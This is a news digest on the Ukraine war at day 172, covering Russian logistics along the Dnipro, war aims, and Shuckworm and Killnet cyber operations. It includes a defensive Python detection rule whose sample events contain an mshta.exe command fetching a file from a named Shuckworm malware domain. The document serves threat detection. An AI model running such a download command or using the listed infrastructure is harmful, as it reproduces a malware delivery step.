Ukraine at D+172: Regrouping along the Dnipro.
Aug 15, 2022

As Russian command elements withdraw east across the Dnipro River, Russian war aims become increasingly clear. Cyber threat actors Shuckworm and Killnet continue to hack (recently with indifferent success) in the Russian interest.


Russian command elements are reported to have withdrawn east of the Dnipro River. According to the Telegraph, the displacing command posts have left approximately 20,000 Russian troops west of the river, where their ability to withdraw and Russia's ability to supply them are increasingly in doubt.

Saturday's situation report from the UK's Ministry of Defence (MoD) focused on bridges, and the challenge of supplying Russian forces occupying positions along the Black Sea. "The two primary road bridges giving access to the pocket of Russian occupied territory on the west bank of the Dnipro in Kherson Oblast are now probably out of use for the purposes of substantial military resupply. On 10 August 2022, Ukrainian precision strikes likely rendered the road crossing of the Dnipro River at Nova Kakhovka unusable for heavy military vehicles. In recent days, Russia has only succeeded in making superficial repairs to the damaged Antonivsky road bridge which likely remains structurally undermined. Last week, the main rail bridge near Kherson was also further damaged. Since late July 2022, Russia has been using a pontoon ferry near the railway bridge as its main military resupply route. Even if Russia manages to make significant repairs to the bridges, they will remain a key vulnerability. Ground resupply for the several thousand Russian troops on the west bank is almost certainly reliant on just two pontoon ferry crossing points. With their supply chain constrained, the size of any stockpiles Russia has managed to establish on the west bank is likely to be a key factor in the force’s endurance."

On Sunday the MoD updated its reports on Russia's shift of regular formations to reinforce southern Ukraine. Militia and conscript units from the Donbas seem to be supplying much of the none-too-plentiful manpower committed to holding ground in Donetsk and Luhansk. "Over the past week, Russia’s priority has likely been to re-orientate units to reinforce southern Ukraine. However, in the Donbas, Russian-backed forces – largely militia of the self-proclaimed Donetsk People’s Republic – have continued to attempt assaults to the north of Donetsk city. Particularly heavy fighting has focused on the village of Pisky, near the site of Donetsk Airport. The settlement probably remains contested. The area has been on the front line of the Donbas Line of Control since 2014. The Russian assault likely aims to secure the M04 highway, the main approach to Donetsk from the west."

Russian war aims.

Granted, Rossiya 1 isn't the Duma, still less the office of President, but there's not a great deal of daylight between those three institutions. Russia Media Monitor shares an unusually forthright discussion in one of that channel's political talk shows of the Ukrainian natural resources (energy, mineral, and arable) and attendant economic potential now under Russian control. While there are a few verbal gestures in the direction of separatist, independent republics benefiting from their prosperous development under Russian protection, the overall content and tone is that the Russian war aim is conquest, and conquest for economic advantage. "It makes me proud," as the moderator says.

Rossiya 1 isn't alone in giving frank expression to expansive Russian war aims. An essay in Foreign Policy by Meduza's Alexey Kovalev lays out the open and overt characterization of Russia's goals and conduct in Russian media generally. "Everything in Yale University historian Timothy Snyder’s “genocide handbook” has already been perpetrated in one form or another, including forced Russification and the abduction of thousands of Ukrainian children to be raised as Russians in the motherland. Kremlin-loyalist media are not only cheering all of this on but demanding even more cruelty: A Komsomolskaya Pravda radio host demanded a gulag to be built for Ukrainian teachers who have been refusing to follow the Russia-supplied syllabus. In case anyone has forgotten, gulags were hard labor camps where an estimated 1.6 million political and other prisoners perished during Soviet dictator Joseph Stalin’s brutal rule."

Kovalev also excoriates Western politicians and academics who he sees as appeasing and enabling Mr. Putin's war, whether on broadly realist grounds or from a position shaped by reflexive progressive anti-war and anti-NATO sentiment. A recent example of the convergence of both points of view appeared this morning in Antiwar, which sees NATO in general and Canada in particular as prosecuting a proxy war against Russia. "Restarting UNIFIER [the Canadian military training mission to Ukrainian forces], which was paused just before Russia’s illegal February 24 invasion, raises a number of moral questions about strengthening the far right, turning civilians into cannon fodder and, most significantly, whether UNIFIER will extend and expand the war. The Canadian government claims its objective is to defend Ukrainian sovereignty, which has a ring of truth to it. But UNIFIER was at the center of Canada’s proxy war with Russia." The article cites the realist political scientist John Mearsheimer ("In a widely viewed, though much maligned, 2015 lecture titled 'Why is Ukraine the West’s Fault?' prominent US realist scholar John Mearsheimer pointed out that pressing Ukraine to get tough with Russia by dangling EU and NATO membership was leading Ukraine 'down the primrose path' that will see the country 'get wrecked.'") The Antiwar piece concludes, "Ottawa restarting Operation UNIFIER adds weight to those who have been saying that NATO’s aim all along has been to fight Russia to the last Ukrainian."

A referendum on annexation by Russia is expected to be held in Donetsk shortly after the province comes under full Russian control, today's MoD situation report says. "On 11 August 2022, Russian media reported that Denis Pushilin, head of the so-called Donetsk People’s Republic (DPR), had said that the date of a referendum on the DPR joining Russia will be announced after the DPR’s ‘complete liberation’. Previously, in June 2022, investigative journalists published evidence of a DPR planning strategy for running such a referendum and for ensuring that at least 70 per cent of votes were in favour of joining Russia. It is likely that Russia is in the advanced planning stages to hold a referendum, though it is unclear if the final decision to go ahead with a vote has yet been taken. The Kremlin will likely see the military’s failure to occupy the entirety of Donetsk Oblast thus far as a setback for its maximalist objectives in Ukraine."

Foreign Affairs offers an interesting summary of Russian strategic and operational mistakes, how Russia seems ready to commit them again in the next phase of the war, and how Russia, by forcible annexations backed by bogus plebiscites, may seek to recast Ukraine as the aggressor.

Shuckworm maintains its focus on Ukrainian targets.

The Symantec Threat Hunter Team, part of Broadcom Software, this morning released a report on the activities of Shuckworm, a Russian state threat actor. The payload in its most recent operation, which Symantec has been tracking since the 15th of July, is an information-stealer. The researchers describe the infection vector: "The first suspicious activity Symantec saw on victim systems was a self-extracting 7-Zip file, which was downloaded via the system’s default browser. Subsequently, mshta.exe downloaded an XML file, which was likely masquerading as an HTML application (HTA) file. These files were downloaded from the following domain: a0698649[.]xsph[.]ru. It has been publicly documented since May 2022 that subdomains of xsph[.]ru are associated with Shuckworm activity, and this domain was once again mentioned in CERT-UA’s July 26 publication about Shuckworm activity." The malicious domain has been seen before: it appeared in an email that pretended to be from the Security Service of Ukraine (SSU), whose phishbait, according to CERT-UA, was a subject line containing “Intelligence Bulletin.” Today's report observes, "This being the case, it is most likely the 7-Zip file seen on victim networks in the campaign observed by Symantec was delivered to victims via email."
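The chain Symantec describes (mshta.exe fetching a remote file from an xsph.ru subdomain) lends itself to a simple process-creation detection. The following is an added example, not code from Symantec or CERT-UA; the event field names are modelled loosely on Sysmon process-creation records and the sample events are constructed, with only the domain taken from the report.

```python
"""Added example: flag mshta.exe launches that retrieve content from a
watched domain family, as in the Shuckworm chain described above.
Field names (Image, CommandLine, ParentImage) are assumptions modelled
on Sysmon-style process-creation records; sample events are constructed."""
import re
from typing import Optional
from urllib.parse import urlparse

# Domain family named in the report; anything else here would be an analyst addition.
SUSPECT_PARENT_DOMAINS = {"xsph.ru"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def host_matches(host: str, parent: str) -> bool:
    """True if host equals parent or is a subdomain of it (label-aware,
    so 'notxsph.ru' does not match 'xsph.ru')."""
    host, parent = host.lower().rstrip("."), parent.lower()
    return host == parent or host.endswith("." + parent)


def defang(host: str) -> str:
    """Render a hostname safely for a report, e.g. a0698649[.]xsph[.]ru."""
    return host.replace(".", "[.]")


def analyse(event: dict) -> Optional[dict]:
    """Return a finding when mshta.exe pulls a remote file from a watched domain."""
    if not event.get("Image", "").lower().endswith("\\mshta.exe"):
        return None
    for url in URL_RE.findall(event.get("CommandLine", "")):
        host = urlparse(url).hostname or ""
        if any(host_matches(host, d) for d in SUSPECT_PARENT_DOMAINS):
            return {"pid": event.get("ProcessId"), "host": defang(host),
                    "parent": event.get("ParentImage"),
                    "rule": "mshta.exe remote HTA/XML from watched domain"}
    return None


# Constructed sample events (not real telemetry). The first mirrors the report's
# chain: a 7-Zip SFX parent, mshta.exe fetching an XML file from the named domain.
SAMPLE_EVENTS = [
    {"ProcessId": 4120, "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe http://a0698649.xsph.ru/report.xml",
     "ParentImage": "C:\\Users\\u\\AppData\\Local\\Temp\\7zSFX.exe"},
    {"ProcessId": 4121, "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe C:\\ProgramData\\Vendor\\setup.hta",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"ProcessId": 4122, "Image": "C:\\Windows\\System32\\mshta.exe",
     "CommandLine": "mshta.exe http://notxsph.ru/a.xml",
     "ParentImage": "C:\\Windows\\explorer.exe"},
]


def run(events=SAMPLE_EVENTS) -> list:
    """Apply analyse() to every event and keep the findings."""
    return [f for f in (analyse(e) for e in events) if f]
```

Local HTA launches and look-alike domains such as notxsph.ru produce no finding; only the subdomain match on the report's domain family fires.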

Shuckworm is also known as Gamaredon, Armageddon, Actinium, or Primitive Bear; BleepingComputer reported last November that Ukraine's SSU had connected the group with a unit of Russia's FSB operating from Crimea. The Symantec Threat Hunter Team's overall picture of Shuckworm sees it as making up in persistence what it lacks in tactical sophistication. "As the Russian invasion of Ukraine approaches the six-month mark, Shuckworm’s long-time focus on the country appears to be continuing unabated. That this recent activity continues even after CERT-UA documented it shows that fear of exposure does not deter the group from its activities. While Shuckworm is not necessarily the most tactically sophisticated espionage group, it compensates for this in its focus and persistence in relentlessly targeting Ukrainian organizations." The report includes a list of indicators of compromise.

Killnet's DDoS and dubious proof-of-work.

Tagesspiegel reports that websites belonging to Latvia's parliament came under distributed denial-of-service attack last Thursday. Killnet claimed responsibility, and the nuisance-level attack is certainly directly in the nominally hacktivist Russian front group's wheelhouse. The attack, which largely fizzled, was a comment on Latvia's vote to designate Russia a terrorist state for its aggression and war crimes in Ukraine.

Killnet's own designation of Lockheed Martin as a "terrorist" organization has been followed by the group's claims that the American manufacturer of HIMARS rocket artillery systems has been successfully subjected to a ransomware attack that exfiltrated data on company personnel. Killnet has published a video they say proves they've got the data, but SecurityWeek Friday reported continuing assessments (most recently by Searchlight Security) that this is an empty claim. “Cross-referencing a sample of the data it does appear that they are or were genuine Lockheed employees, however that does not necessarily confirm that the company was breached,” the outlet quotes a Searchlight analyst as saying. “For example, this could be a re-hash of old or open source data in an attempt to undermine the organization and intimidate its employees.”